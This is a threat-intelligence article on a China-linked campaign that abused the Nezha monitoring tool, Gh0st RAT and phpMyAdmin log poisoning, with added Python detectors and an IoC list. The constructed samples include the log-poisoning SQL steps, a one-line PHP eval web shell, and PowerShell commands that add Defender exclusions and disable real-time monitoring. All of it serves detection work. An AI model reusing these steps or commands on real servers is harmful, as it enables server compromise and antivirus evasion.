Chinese Hackers Exploit Nezha Tool to Compromise Web Servers

In a campaign active since August 2025, a China-linked threat actor has been abusing Nezha, a legitimate open-source server monitoring and operations tool, to run commands and stage malware on compromised web servers. The campaign, documented by the security firm Huntress, is the first publicly reported case of Nezha being misused this way, and it is another instance of attackers adopting legitimate open-source administration tools as implants: traffic to and from such tools looks like ordinary operations software, which makes it harder to flag.

Initial Access via Log Poisoning

The attackers got in through a publicly exposed phpMyAdmin panel that required no authentication. Connecting from an AWS-hosted IP address in Hong Kong, they immediately switched the interface language to simplified Chinese, which is consistent with a Chinese-speaking operator.

They then planted a web shell through log poisoning, a technique that turns the database's own query log into an attacker-controlled file. Through phpMyAdmin they pointed MariaDB's general query log (the `general_log_file` variable) at a PHP file inside the web root, enabled the log (`general_log`), and ran a query whose text contained a one-line PHP web shell. MariaDB writes every statement it receives into that file verbatim, so the PHP open tag lands in a file the web server will execute; PHP ignores the surrounding log text and runs only what is inside the tag. The technique needs two things that this XAMPP-style Windows deployment provided: a database account allowed to change global server variables, and a database process with write access to the web root. With the shell in place the attackers drove it with AntSword, a web shell management client, to run arbitrary commands on the server.
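The following is an added example, not code from the article or from Huntress: a Python detector that reads a MariaDB general-log style query record and flags the poisoning chain (general log redirected into a web root, log switched on, a statement carrying a PHP open tag), plus a check for files in a web root that are really redirected MariaDB logs. The log excerpt and the poisoned-file content are constructed samples; the web root path follows the IoC list, while the log line layout, the regexes, the served-extension list and the severity labels are this example's own assumptions (a real source such as the MariaDB server_audit plugin or a database proxy uses a different line format and needs its own parser).

```python
import re
from typing import Iterator, List, NamedTuple, Optional, Sequence, Tuple

# Constructed sample: a MariaDB general-log style record (Time / Id / Command / Argument
# columns) reproducing the poisoning sequence described above. Illustrative data only,
# not log content from the Huntress report. Note the shell query arrives on a different
# connection id: phpMyAdmin opens a fresh database connection for every HTTP request.
SAMPLE_QUERY_LOG = (
    "250812 10:15:20\t    12 Connect\troot@localhost as anonymous on\n"
    "250812 10:15:22\t    12 Query\tSET GLOBAL general_log_file = 'C:/xamp/htdocs/123.php'\n"
    "250812 10:15:23\t    12 Query\tSET GLOBAL general_log = 'ON'\n"
    "250812 10:15:25\t    14 Query\tSELECT '<?php eval($_POST[\"x\"]); ?>'\n"
    "250812 10:16:01\t    15 Query\tSELECT * FROM users WHERE id = 1\n"
)

# Constructed sample of the planted file: MariaDB writes its log banner first, then each
# statement verbatim; PHP executes only the part between <?php and ?>. Version string assumed.
SAMPLE_POISONED_FILE = (
    "C:\\xamp\\mysql\\bin\\mysqld.exe, Version: 10.4.32-MariaDB (mariadb.org binary distribution). "
    "started with:\n"
    "TCP Port: 3306, Named Pipe: (null)\n"
    "Time                 Id Command    Argument\n"
    "250812 10:15:25\t    14 Query\tSELECT '<?php eval($_POST[\"x\"]); ?>'\n"
)

LOG_LINE = re.compile(r"^(?:\d{6} \d\d:\d\d:\d\d)?\t\s*(\d+)\s+(\w+)\t(.*)$")
SET_LOG_FILE = re.compile(r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*['\"]?([^'\";]+)", re.I)
SET_LOG_ON = re.compile(r"set\s+(?:global\s+|@@global\.)general_log\s*=\s*['\"]?(?:on|1)\b", re.I)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
LOG_BANNER = re.compile(r"^Time\s+Id\s+Command\s+Argument\s*$", re.M)
SERVED_EXT = (".php", ".phtml", ".php5", ".phar")  # assumed to be handed to the PHP module


class Finding(NamedTuple):
    line_no: int
    conn_id: str
    severity: str
    reason: str
    statement: str


def _norm(path: str) -> str:
    """Compare paths case-insensitively with forward slashes (Windows web roots)."""
    return path.replace("\\", "/").lower()


def parse_query_log(text: str) -> Iterator[Tuple[int, str, str, str]]:
    """Yield (line_no, conn_id, command, argument) for every well-formed log line."""
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if m:
            yield n, m.group(1), m.group(2), m.group(3)


def detect_log_poisoning(text: str, web_roots: Sequence[str]) -> List[Finding]:
    """Flag the general_log_file -> web root -> PHP-in-query chain.

    general_log_file is a GLOBAL server variable: once redirected it captures the
    statements of every later connection, not only the one that changed it, so the
    redirect state is kept server-wide rather than per connection.
    """
    roots = [_norm(r).rstrip("/") + "/" for r in web_roots]
    redirected: Optional[str] = None
    findings: List[Finding] = []
    for n, conn, cmd, arg in parse_query_log(text):
        if cmd.lower() != "query":
            continue
        m = SET_LOG_FILE.search(arg)
        if m:
            path = _norm(m.group(1).strip())
            if any(path.startswith(r) for r in roots):
                redirected = path
                sev = "critical" if path.endswith(SERVED_EXT) else "high"
                findings.append(Finding(n, conn, sev, f"general_log_file redirected into web root: {path}", arg))
            else:
                redirected = None  # log moved somewhere outside the web root
        elif SET_LOG_ON.search(arg) and redirected:
            findings.append(Finding(n, conn, "high", "general_log enabled while pointed at web root", arg))
        if PHP_TAG.search(arg):
            sev = "critical" if redirected else "medium"
            findings.append(Finding(n, conn, sev, "statement text contains a PHP open tag", arg))
    return findings


def looks_like_poisoned_log(content: str) -> bool:
    """True when a file found in a web root is a MariaDB general log that carries PHP."""
    return bool(LOG_BANNER.search(content)) and bool(PHP_TAG.search(content))


if __name__ == "__main__":
    for f in detect_log_poisoning(SAMPLE_QUERY_LOG, [r"C:\xamp\htdocs", "/var/www/html"]):
        print(f"line {f.line_no} conn {f.conn_id} [{f.severity}] {f.reason}")
    print("poisoned log in web root:", looks_like_poisoned_log(SAMPLE_POISONED_FILE))
```

A PHP open tag in a statement is only "medium" on its own because legitimate applications do store PHP fragments in databases; it becomes decisive once the general log has been pointed into a web root. The second check, `looks_like_poisoned_log`, is the cheap one to run over every web root on a suspect host: a file that begins with MariaDB's log banner has no business being served by Apache.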

Deployment of Nezha Monitoring Tool

With command execution through the web shell, the attackers moved to a more persistent and flexible foothold. Over the AntSword session they downloaded and ran `live.exe`, an installer for a Nezha agent. Nezha is an open-source platform for server monitoring and operations: a dashboard manages a fleet of agents and lets the operator run commands and scheduled tasks on them. Pointed at an attacker-owned dashboard, the agent becomes a ready-made remote-access implant that looks like ordinary monitoring software.

The agent’s configuration file pointed at the attacker’s command-and-control (C2) server, which was running a Nezha dashboard. The dashboard, whose interface was set to Russian, listed more than 100 victim machines across 53 regions, most of them in East Asia. Huntress attributes the activity to a China-linked operator; the Chinese-language artifacts and the victim concentration fit that assessment, while the Russian-language dashboard is a reminder that interface language on its own is weak evidence for attribution.

Privilege Escalation and Deployment of Ghost RAT

With the Nezha agent giving them stable, low-profile access, the attackers escalated their privileges. Through Nezha’s command execution they opened an interactive PowerShell session and added a Windows Defender exclusion so that their staging directory would not be scanned. Immediately afterwards they dropped `x.exe`, a variant of Gh0st RAT (often written Ghost RAT), a remote access trojan used for years in Chinese-speaking threat activity. Its network protocol and persistence mechanism matched those seen in earlier campaigns attributed to Chinese advanced persistent threat (APT) groups. The indicators below also include a renamed copy of rundll32.exe (`SQLlite.exe`) and a DLL dropped into System32, which suggests the RAT component was loaded through rundll32 rather than executed directly.

Indicators of Compromise (IoCs)

The following IoCs have been identified in this campaign:

– Web Shell:
  – File Path: C:\xamp\htdocs\123.php
  – SHA256: f3570bb6e0f9c695d48f89f043380b43831dd0f6fe79b16eda2a3ffd9fd7ad16

– Nezha Agent:
  – File URL: https://rism.pages[.]dev/microsoft.exe
  – File Path: C:\Windows\Cursors\live.exe
  – SHA256: 9f33095a24471bed55ce11803e4ebbed5118bfb5d3861baf1c8214efcd9e7de6

– Gh0st RAT Payload:
  – File Path: C:\Windows\Cursors\x.exe
  – SHA256: 7b2599ed54b72daec0acfd32744c7a9a77b19e6cf4e1651837175e4606dbc958

– Renamed rundll32.exe:
  – File Path: C:\Windows\system32\SQLlite.exe
  – SHA256: 82611e60a2c5de23a1b976bb3b9a32c4427cb60a002e4c27cadfa84031d87999

– Malicious DLL:
  – File Path: C:\Windows\system32\32138546.dll
  – SHA256: 35e0b22139fb27d2c9721aedf5770d893423bf029e1f56be92485ff8fce210f3
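As an added example (not code from the article or from Huntress), the Python below turns the IoC list into an offline triage script: it sweeps a directory tree for the listed file paths and SHA256 hashes, and it scans PowerShell script block text for the Defender exclusion step described above. The hashes and paths are the ones listed; the sample directory tree and the PowerShell script block entries are constructed here, the drive mapping and output format are this example's own assumptions, and the Defender check deliberately generalises to `Set-MpPreference -Disable*` switches that the article does not mention.

```python
import hashlib
import re
import shutil
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List, Set, Tuple

# SHA256 values and file paths from the IoC list above. Paths are normalised to lower
# case with forward slashes so they compare the same way on every platform.
IOC_HASHES: Dict[str, str] = {
    "f3570bb6e0f9c695d48f89f043380b43831dd0f6fe79b16eda2a3ffd9fd7ad16": "web shell 123.php",
    "9f33095a24471bed55ce11803e4ebbed5118bfb5d3861baf1c8214efcd9e7de6": "Nezha agent live.exe",
    "7b2599ed54b72daec0acfd32744c7a9a77b19e6cf4e1651837175e4606dbc958": "Gh0st RAT x.exe",
    "82611e60a2c5de23a1b976bb3b9a32c4427cb60a002e4c27cadfa84031d87999": "renamed rundll32 SQLlite.exe",
    "35e0b22139fb27d2c9721aedf5770d893423bf029e1f56be92485ff8fce210f3": "malicious DLL 32138546.dll",
}
IOC_PATHS: Set[str] = {
    "c:/xamp/htdocs/123.php",
    "c:/windows/cursors/live.exe",
    "c:/windows/cursors/x.exe",
    "c:/windows/system32/sqllite.exe",
    "c:/windows/system32/32138546.dll",
}

# Constructed PowerShell script block log entries (Event ID 4104, ScriptBlockText field)
# illustrating the Defender exclusion step. Example data, not log content from the report.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Windows\\Cursors",
    "Add-MpPreference -ExclusionPath 'C:\\Windows\\Cursors'",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
]
DEFENDER_TAMPER = re.compile(
    r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b|Set-MpPreference\b.*-Disable\w+",
    re.I | re.S,
)


def norm_win(path: str) -> str:
    return path.replace("\\", "/").lower()


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_tree(root: Path, hashes: Dict[str, str] = IOC_HASHES, paths: Set[str] = IOC_PATHS,
               drive: str = "C:") -> List[Tuple[str, str]]:
    """Walk `root` as if it were the given drive and report path and hash matches.

    On a Windows host call sweep_tree(Path("C:/")); in the offline demo a temporary
    directory stands in for the drive. Unreadable files are skipped, not fatal.
    """
    hits: List[Tuple[str, str]] = []
    for p in root.rglob("*"):
        try:
            if not p.is_file():
                continue
            virtual = norm_win(f"{drive}/{p.relative_to(root).as_posix()}")
            if virtual in paths:
                hits.append((virtual, "path matches IoC"))
            digest = sha256_of(p)
        except OSError:
            continue
        if digest in hashes:
            hits.append((virtual, f"SHA256 matches IoC: {hashes[digest]}"))
    return hits


def find_defender_tampering(script_blocks: Iterable[str]) -> List[str]:
    """Return script blocks that add Defender exclusions or disable Defender features."""
    return [s for s in script_blocks if DEFENDER_TAMPER.search(s)]


def build_demo_tree() -> Path:
    """Constructed stand-in for a host's C: drive: benign files plus files at IoC paths."""
    root = Path(tempfile.mkdtemp(prefix="nezha-ioc-demo-"))
    for rel, data in {
        "Windows/Cursors/x.exe": b"MZ placeholder, not the real sample",  # IoC path, unknown hash
        "Windows/System32/SQLlite.exe": b"MZ placeholder for the renamed rundll32",
        "Windows/System32/notepad.exe": b"MZ benign placeholder",
        "xamp/htdocs/index.php": b"<?php echo 'hello'; ?>",
    }.items():
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_bytes(data)
    return root


def run_demo() -> dict:
    root = build_demo_tree()
    try:
        path_hits = sweep_tree(root)
        # Exercise the hash path with a digest computed from the constructed benign file.
        digest = sha256_of(root / "Windows/System32/notepad.exe")
        hash_hits = sweep_tree(root, hashes={digest: "constructed test file"}, paths=set())
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return {
        "path_hits": sorted(path_hits),
        "hash_hits": hash_hits,
        "defender": find_defender_tampering(SAMPLE_SCRIPT_BLOCKS),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

A path hit without a hash hit still matters: the operator can rebuild `x.exe` or the Nezha agent at will, but the staging directory and the renamed `rundll32.exe` in System32 are habits that survive a recompile. Treat the hash list as confirmation, the path list and the Defender tampering check as the hunt.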

Implications and Recommendations

This incident underscores the necessity of hardening public-facing applications and monitoring for the abuse of legitimate software, as threat actors continue to adapt their playbooks to stay ahead of defenders. Organizations are advised to:

1. Secure Public-Facing Applications: Database administration panels such as phpMyAdmin should not be reachable from the internet at all; where remote access is unavoidable, require authentication (never an account without a password), restrict access by VPN or IP allowlist, and give the panel’s database account only the privileges the application needs. In particular, that account should not hold the privilege required for `SET GLOBAL`, which is what makes redirecting `general_log_file` possible, and the database service should run under an account that cannot write to the web root.

2. Monitor for Abuse of Legitimate Tools: Keep an inventory of the remote-management and monitoring agents you have deployed, and alert on any agent, Nezha included, that appears on a host where you did not install it or that reports to a dashboard you do not operate.

3. Implement Robust Logging and Monitoring: Log and alert on changes to MariaDB’s `general_log` and `general_log_file` variables, on new `.php` files appearing in web roots, on Windows Defender exclusion changes (Defender operational log event ID 5007), on PowerShell script block logs (event ID 4104) containing `Add-MpPreference`, and on unexpected outbound connections from web servers.

4. Conduct Regular Security Assessments: Perform periodic security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited by attackers.

By adopting these measures, organizations can enhance their security posture and mitigate the risks associated with such sophisticated cyberattack campaigns.